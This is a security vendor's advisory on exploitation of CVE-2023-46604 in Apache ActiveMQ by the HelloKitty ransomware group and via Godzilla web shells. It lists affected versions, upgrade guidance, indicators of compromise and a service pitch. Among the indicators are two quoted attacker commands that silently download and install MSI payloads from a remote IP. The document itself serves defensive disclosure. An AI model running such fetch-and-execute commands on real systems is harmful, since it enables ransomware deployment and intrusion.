Flash Notice: UPDATE - Hello Kitty Ransomware Group Exploiting Critical Vulnerability in Apache ActiveMQ

UPDATE (1/23/2024) -

This week, cybersecurity researchers are sounding the alarm regarding CVE-2023-46604, an Apache ActiveMQ. Although the vulnerability was patched in October 2023, threat actors are exploiting the flaw to deploy the Godzilla web shell on compromised hosts.  

Trustwave reports that the web shells are hidden in an unidentified binary format, strategically crafted to bypass security measures and signature-based scanners. Despite the undisclosed file format of the binary, ActiveMQ's JSP engine continues with compiling and running the web shell.  

CVE-2023-46604 now has a CVSS score of 10. Trustwave also reports that Vulnerable instances have fallen victim to JSP-based web shells inserted into the "admin" folder of the ActiveMQ installation directory. The Godzilla webshell has the capability to parse incoming HTTP POST requests, execute the content, and provide the results through an HTTP response. It is highly recommended that all users update to the latest version of Apache ActiveMQ as soon as possible.  

overview

This week, researchers from Rapid7 have issued a warning regarding the suspected exploitation of a critical vulnerability, tracked as CVE-2023-46604, in Apache ActiveMQ. Apache ActiveMQ is an open-source message broker software, serving as a message-oriented middleware platform. It facilitates communication and data exchange between various applications.  

Rapid7's investigation revealed that threat actors (HelloKitty) attempted to exploit CVE-2023-46604 to deploy HelloKitty ransomware in two separate customer environments. The ransomware deployment was observed in cases where organizations were running outdated versions of Apache ActiveMQ. 

The vulnerability in question is a remote code execution flaw affecting Apache ActiveMQ, allowing remote attackers to execute arbitrary shell commands by manipulating serialized class types in the OpenWire protocol. Apache released updated versions of ActiveMQ to address this vulnerability. Impacted versions of Apache ActiveMQ include: 

• Apache ActiveMQ 5.18.0 before 5.18.3 
• Apache ActiveMQ 5.17.0 before 5.17.6 
• Apache ActiveMQ 5.16.0 before 5.16.7 
• Apache ActiveMQ before 5.15.16 
• Apache ActiveMQ  Legacy OpenWire Module 5.18.0 before 5.18.3 
• Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6 
• Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7 
• Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16 

Since the disclosure of the vulnerability, a proof-of-concept (PoC) exploit code and technical details have become publicly available. The Shadowserver Foundation reported that as of October 30, approximately 7,249 Apache ActiveMQ instances were exposed to the internet, with around 3,329 of them vulnerable to the flaw. Organizations are strongly advised to update to fixed versions of Apache ActiveMQ as soon as possible.  

avertium's recommendationS

• Apache recommends that users upgrade to version(s):  
  • 5.15.16
  • 5.16.7 
  • 5.17.6 
  • 5.18.3 
• Information regarding updates can be found in Apache’s release notes.  
• You may also find helpful tip on improving the security of ActiveMQ instances here.  

INDICATORS OF COMPROMISE (IoCs)

Rapid7's security team looked into CVE-2023-46604 and examined the exploit code available to the public. During their testing, they found that the activemq.log file recorded a single line that confirmed the successful use of CVE-2023-46604. In this specific case, the individual responsible (in this instance, a researcher) operated from the IP address 192[.]168[.]86[.]35 and targeted TCP port 61616. It's important to note that the level of detail in the log entries can be different, depending on the logging settings, which can be adjusted as needed. 

Rapid7 has also listed other IoCs found below: 

• hxxp://172.245.16[.]125/m2.png 
• hxxp://172.245.16[.]125/m4.png 

Files dropped and executed via the msiexec command: 

• cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png" 
• cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png" 

Hashes that are part of the two MSI packages downloaded from the domain 172[.]245[.]16[.]125: 

• M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4 
• M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0 
• dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7 
• EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5 

How Avertium is Protecting Our CUSTOMERS

• Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills. See every threat in your attack surface, every device, every entry point, and every vulnerability. Our Attack Surface Management services include:  
  • Risk Assessments 
  • Pen Testing and Social Engineering  
  • Infrastructure Architecture and Integration  
  • Zero Trust Network Architecture 
  • Vulnerability Management 
• Fusion MXDR is the first MDR offering that fuse together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity – one that is greater than the sum of its parts. 
• Note: We highly value your feedback. Kindly spare a moment to complete our feedback form, allowing us to enhance our services for our valued customers. 

SUPPORTING DOCUMENTATION